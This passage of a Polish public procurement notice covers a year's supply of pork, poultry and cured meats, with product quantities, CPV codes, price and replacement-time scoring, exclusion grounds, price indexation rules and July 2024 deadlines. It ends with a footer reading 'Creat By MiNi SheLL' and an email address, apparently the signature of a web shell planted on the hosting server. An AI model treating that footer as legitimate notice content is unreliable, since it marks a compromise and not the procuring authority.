170<br/>31	Szynka wędzona	kg	100<br/>32	Baton drobiowy	Kg	40<br/>33	Polędwica drobiowa	Kg	80<br/>34	Rolada drobiowa	Kg	15<br/>35	Kurczak w galarecie	kg	10<br/>36	Fantazja drobiowa	kg	10<br/>37	Mielonka drobiowa	kg	100<br/>38	Szynka drobiowa	kg	80<br/>39	Salceson czarny	kg	60<br/>40	Kaszanka	kg	180<br/>41	Salceson ozorkowy	kg	20<br/>42	Parówka serdelka	kg	190<br/>43	Parówka cienka	kg	30<br/>44	Parówka hot-dog	kg	250<br/>45	Kiełbasa śląska	kg	200<br/>46	Kiełbasa zwyczajna	kg	250<br/>47	Kiełbasa podwawelska	kg	90<br/>48	Kiełbasa toruńska	kg	100<br/>49	Kiełbasa grillowa	kg	220<br/>50	Kiełbaski śniadaniowe	kg	200<br/>51	Kabanosy	kg	20<br/>52	Kiełbasa biała parzona	kg	220<br/>53	Krakowska parzona	kg	160<br/>54	Krakowska sucha	kg	10<br/>55	Ogonówka	kg	170<br/>56	Metka	kg	60<br/>57	Mielonka wieprzowa	kg	100<br/>58	Mortadela	Kg	160<br/>59	Rolada wieprzowa	kg	60<br/>60	Szynka konserwowa prasowana	kg	100<br/>61	Szynka wieprzowa w galarecie z warzywami	kg	20<br/>62	Szynka wieprzowa	kg	125<br/>63	Zielonogórska wieprzowa	kg	10<br/>64	Przysmak w konserwie	kg	110<br/>65	Żywiecka wieprzowa	kg	130<br/>66	Pasztetowa	kg	100<br/>67	Pasztet pieczony	kg	100<br/>68	Pasztet (konserwa)	kg	20<br/>69	Konserwa wieprzowa	kg	10 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15113000-3 - Wieprzowina</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <p class="mb-0">15131130-5 - Wędliny</p> <p class="mb-0">15131310-1 - Pasztety</p> <p class="mb-0">15112130-6 - Kurczęta</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Za ofertę najkorzystniejszą dla każdej z części od 1 do 2 zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: <br/>1)	„Łączna cena ofertowa brutto” – C<br/>2)	„Najkrótszy czas wymiany wadliwego towaru” – W<br/><br/><br/><br/><br/>2.	Powyższym kryteriom Zamawiający przypisał następujące znaczenie:<br/>Kryterium<br/> Waga [%] -Punkty<br/>	Waga (%)	Liczba punktów	<br/>Sposób oceny wg wzoru lub wg zestawienia<br/><br/>Cena <br/> ( Łączna cena ofertowa brutto )<br/><br/>	60 %	60	C<br/>Cena najtańszej oferty<br/>C = ------------------------------------------------- x 60 pkt<br/>Cena badanej oferty<br/><br/>Jakość<br/>(Najkrótszy czas wymiany towaru nie więcej niż 6 godzin podanych w pełnych godzinach)<br/><br/>	40%	40	W<br/>nie więcej niż 3 h – 40 pkt.<br/>powyżej 3 h nie więcej niż 4 h – 30 pkt.<br/>powyżej 4 h nie więcej niż 5 h – 20 pkt.<br/>powyżej 5 h nie więcej niż 6 h – 10 pkt.<br/><br/>RAZEM	100%	100	────────────────────<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru: <br/>L = C + W<br/>gdzie: <br/>L - całkowita liczba punktów,<br/>C - punkty uzyskane w kryterium „Łączna cena ofertowa brutto”, <br/>W - punkty uzyskane w kryterium „Najkrótszy czas wymiany towaru”.<br/><br/>Jeżeli Wykonawca nie określi czasu wymiany towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas 6 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najkrótszy czas wymiany towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, tj.: <br/>1.2 w zakresie braku podstaw wykluczenia:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, z zastrzeżeniem ust. 2 niniejszego rozdziału;<br/>w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. dokument składa każdy z tych Wykonawców;<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to zgodnie z § 4 ust 1 pkt 3 lit. b rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415), zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/><br/>1)	Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania,<br/>2)	Załącznik nr 3 do SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej,<br/>2.Wykonawcy wspólnie ubiegający się o zamówienie: <br/>1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania; <br/>2) zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia; <br/>3) pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną, zaś fakt ustanowienia pełnomocnictwa musi wynikać z załączonych do oferty dokumentów; <br/>4) pełnomocnictwo składa się w formie określonej w Rozdziale IX ust. 5 SWZ. <br/>2. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy żądać przedstawienia w określonym terminie umowy regulującej współpracę tych Wykonawców. <br/>3. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. <br/>4. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom pod warunkiem, że posiadają oni uprawnienia do ich wykonania. Wykonanie zamówienia przez podwykonawcę nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie zamówienia oraz z odpowiedzialności za wykonanie obowiązków wynikających z umowy i obowiązujących przepisów prawa. Wykonawca odpowiada za działania i zaniechania podwykonawców jak za własne. <br/>5. Zamawiający żąda aby Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, podał taką informację w formularzu oferty wraz ze wskazaniem zakresu zamówienia, jaki zamierza powierzyć podwykonawcom oraz nazw podwykonawców, o ile są znane na etapie składania ofert. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 454 i art. 455 ustawy PZP.<br/>2.	Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:<br/>1)	nazwy, adresu oraz osób reprezentujących Strony, a także osób wymienionych w § 6;<br/>2)	cen artykułów zawartych w formularzach cenowych;<br/>3)	urzędowej stawki podatku VAT na artykuły zawarte w formularzach cenowych.<br/>3.	Ustala się następujące zasady zmiany cen, o której mowa w ust. 2 pkt 2:<br/>1)	podstawą ewentualnej waloryzacji cen będą wskaźniki cen towarów i usług konsumpcyjnych (inflacja) w stosunku do okresu od zawarcia umowy do wystąpienia o waloryzację, ogłaszane dla poszczególnych grup towarów objętych umową w tabelach zawartych w Biuletynie Statystycznym Głównego Urzędu Statystycznego, <br/>2)	zmiana cen danego artykułu o nie więcej niż 3 %, nie będzie podstawą do zmiany umowy,<br/>3)	waloryzacja powodująca zmniejszenie lub zwiększenie cen przyjętych w umowie może być dokonana na wniosek Zamawiającego lub Dostawcy, nie wcześniej jednak niż po 6 miesiącach obowiązywania umowy,<br/>4)	w przypadku gdy umowa zostanie zawarta po upływie 180 dni od dnia, w którym upłynął termin składania ofert, termin o którym mowa w pkt. 3, rozpocznie swój bieg od dnia otwarcia ofert,<br/>5)	każda ze Stron ma prawo do jednokrotnej waloryzacji na swoją korzyść,<br/>6)	nowa cena będzie obowiązywała od daty wskazanej w aneksie do umowy,<br/>7)	w związku z waloryzacją dokonaną na podstawie ust. 2 pkt 2 łączna kwota, o którą wrosną ceny towarów stanowiących przedmiot dostawy nie może przekroczyć 30 % wartości umowy określonej w § 1 ust. 4.<br/>4.	Zamawiający lub Dostawca wnioskując o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą Stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.<br/>5.	Zmiana urzędowej stawki VAT, o której mowa w ust. 2 pkt 3, nie wymaga zawierania przez Strony aneksu do umowy; Dostawca jest zobowiązany o takiej zmianie niezwłocznie pisemnie poinformować Zamawiającego <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ossw_sucha</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-15 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 7.	Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania platformazakupowa.pl , w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.<br/>8.	Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje <br/>9.	Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>10.	Lista pozostałych zaleceń/rekomendacji:<br/>1)	Rekomenduje się wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>2)	W celu ewentualnej kompresji danych rekomenduje się wykorzystanie jednego z rozszerzeń:<br/>a)	.zip<br/>b)	.7Z<br/>3)	Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu zaleca się, w miarę możliwości, przekonwertowanie plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PadES.<br/>5)	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>6)	Zwraca się uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB<br/>7)	Zaleca się, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów <br/> z weryfikacją plików.<br/>8)	Ofertę należy przygotować z należyta starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugeruje się złożenie oferty na 24 godziny przed terminem składania ofert/wniosków.<br/>9)	Jeśli wykonawca pakuje dokumenty np. w plik .zip zaleca się wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>10)	Rekomenduje się wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>11)	Zaleca się, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty.<br/>12)	Korzystanie z Platformy jest bezpłatne.

Creat By MiNi SheLL
Email: jattceo@gmail.com